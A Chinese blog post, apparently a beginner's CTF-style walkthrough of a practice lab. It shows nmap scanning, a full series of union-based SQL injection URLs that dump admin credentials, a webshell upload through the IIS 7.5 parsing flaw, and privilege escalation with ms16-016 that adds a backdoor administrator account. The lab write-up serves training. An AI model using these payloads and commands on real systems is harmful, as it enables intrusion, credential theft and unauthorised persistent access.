记第一次实战靶场的经验

前言：

这个靶场是我们学长发给我的一个练习靶场，我中间也是失败了好几次才成功打完这个靶场,虽然过程不是特别的顺利，但是通关之后还是很开心，毕竟我在安全方面还是一个小白，通过这次实战也获得了很多经验。下面我们就来看看通关这个靶场的过程吧。

渗透测试流程

信息收集->目标分析->实施攻击->提权->痕迹清除

信息收集：

IP、端口（服务）、目录扫描、CMS（指纹识别）->历史漏洞、子域名->更多的服务、Goby->资产收集（华为路由、海康威视、FOFA、钟馗之眼、Google黑语法)

目标分析：

查看各个功能

实施攻击：

SQL注入

闭合->查看字段->查看显示位->查基本信息（数据库名称、版本号）->表名（table_name)->字段名(column)->敏感数据

攻击机：windows 10

被攻击机(肉机)：windows 7->开启web服务

1、我们先在虚拟机上开启被攻击机。

2、我们在本机打开命令行查看Windows 7 的IP。

3、我们获取到IP之后可以用namp进行主机的探活，然后我们就可以获取到目标主机的IP 192.168.182.183

4、获取到目标主机的IP之后我们在浏览器中访问一下。

5、访问了目标主机的IP之后，我们可以进行一个端口的探测（查看开放了哪些端口等等。）

nmap -sS -n -A -T4 -p- 192.168.182.183
-sS 指定某个协议
-n  防止反解析
-A  探测目标主机的版本及操作系统
-T4  快速扫描
-p-  指定IP,对所有端口进行探测

6、打开站点，任意复制一张图像地址，然后逐一删减查看（主要是为了查看是否存在目录遍历漏洞），但是这个靶场不存在目录遍历漏洞。然后我们随便进入一个页面，发现我们进入的这个页面是由一个参数控制的，这里我们可以尝试使用文件包含漏洞（本地文件包含和远程文件包含），SQL注入等漏洞。

7、我们经过尝试之后发现了SQL注入漏洞（我们在url中输入单引号后报错），而且我们从报错信息中获取到应该是用）闭合。

8、接下来我们尝试SQL注入。

（1）判断是否存在SQL注入

http://192.168.182.183/index.php?s=/news/6) and 1=1-- -
http://192.168.182.183/index.php?s=/news/6) and 1=2-- -

（2）猜解字段数

http://192.168.182.183/index.php?s=/news/6) order by 7-- -     （该数据库有7个字段）

（3）查看显示位

http://192.168.182.183/index.php?s=/news/-6) union select 1,2,3,4,5,6,7-- -

(4)猜解数据库名

http://192.168.182.183/index.php?s=/news/-6) union select 1,2,3,4,5,6,database()-- -

(5)猜解表名

http://192.168.182.183/index.php?s=/news/-6) union select 1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=database()-- -

(6)猜解列名

http://192.168.182.183/index.php?s=/news/-6) union select 1,2,3,4,5,6,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='tpx_admin_user'-- -

(7)猜解数据

http://192.168.182.183/index.php?s=/news/-6) union select 1,2,3,4,5,6,group_concat(username,0x7e,password) from tpx_admin_user-- -

我们获取到了第一个flag1:flag~XTDXANDLDXY

9、然后我们尝试进入管理后台（在url中输入admin.php）,在这之前我们可以使用目录扫描工具扫描该页面存在的目录，我们可以看到有一个admin.php目录。

10、我们利用SQL注入爆破出来的用户名和密码登录 admin~VFZSSmVrNUVWVEpaYlhneFdsRTlQUT09，但是密码是base64二次解密后的结果 MTIzNDU2Ymx1ZQ==

成功进入管理后台之后，为了拿到目标主机权限，寻找文件上传点，并利用IIS7.5文件解析漏洞上传木马。

注意：我们打开这个页面后发现文件上传点未加载，需要使用burp suite配置

发现目标主机为IIS7.5，尝试使用IIS7.5文件解析漏洞进行攻击

使用蚁剑连接，发现C盘根目录存在flag2.txt / flag{ajkwncalwrli}

然后我们进行渗透，使用CS自带的ms16-016一键提权或者上传可执行文件

eop.exe "net user mark mark123+++ /add"
eop.exe "net localgroup adminisrators mark /add"

之后我们可以连接远程桌面获得flag3 / cjdhrncalzos

注：实战中的情况千变万化，我们需要不断地尝试去寻找突破，虽然过程有些许的复杂，但是成功之后也会获得慢慢的成就感。

若其中有不对的地方，希望大佬们能够提一些建议。

记第一次实战靶场的经验相关推荐

记第一次C++面试与经验分享
**记第一次C++面试与经验分享 #记第一次C++面试与经验分享# ** 这篇文章写于本人大三下学期. 本人菜鸟一枚,所学专业是电子科学与技术(集成电路方面),但由于感觉本专业历届学长学姐从事本行业人 ...
记第一次出差得出的经验
文章目录 1:背景 2:过程 3:心得 1:背景由于上家公司的某种原因,离职来到了新公司,内中原因不足道也.新公司业务方向暂且不说,入职后,个人看着以前的产品视频学习了不到两周,被带教老大告知有新项 ...
CIO实战方法与经验分享(转自赛迪网)
吴文钊赛迪网在线访谈实录聊天主题: CIO实战方法与经验分享 [系统公告]: 吴文钊进入了聊天室 [系统公告]: 程鸿进入了聊天室 [系统公告]: 网友进入了聊天室程鸿: 各位网友大家好! 程鸿: ...
暗月渗透实战靶场-项目六（上）
暗月渗透实战靶场-项目六环境搭建使用的是暗月提供的环境直接虚拟机运行即可设置网络环境网卡配置的时候为了方便直接使用的是暗月的vm19的网卡配置的内网环境 00x1-信息搜集我们已经知道目标 ...
记第一次使用CDSN进行学习记录
记第一次使用CDSN进行学习记录先立个flag: 目标使用R进行数据可视化及简单数据分析.熟练使用SAS进行数据管理,分析. 再立flag: 尽量每周五更新以下markdown小技巧保留,方便查看 ...
全！CTF靶场、渗透实战靶场总结 (适合收藏)
CTF靶场.渗透实战靶场总结 (适合收藏) CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门.提升自己.丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的美团杯): 渗透实战靶场: ...
VulnHub渗透测试实战靶场 - Odin：1
VulnHub渗透测试实战靶场 - Odin:1 题目描述环境下载 NULLY CYBERSECURITY: 1靶机搭建渗透测试信息搜集漏洞挖掘 getshell 提权题目描述 Odin v ...
记第一次使用tiptap踩的坑
记第一次使用tiptap踩的坑引入tiptap之后直接报错Duplicate use of selection JSON ID cell 局部引用报错样式问题引入tiptap之后直接报错Dupl ...
VulnHub渗透测试实战靶场 - POTATO (SUNCSR): 1
VulnHub渗透测试实战靶场 - POTATO(SUNCSR): 1 环境下载 POTATO (SUNCSR): 1靶机搭建渗透测试信息搜集漏洞挖掘 getshell 提权环境下载戳此进行 ...
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE 环境下载 THE ETHER: EVILSCIENCE靶机搭建渗透测试信息搜集漏洞挖掘 getshell 提权 ...

记第一次实战靶场的经验

记第一次实战靶场的经验相关推荐

最新文章

热门文章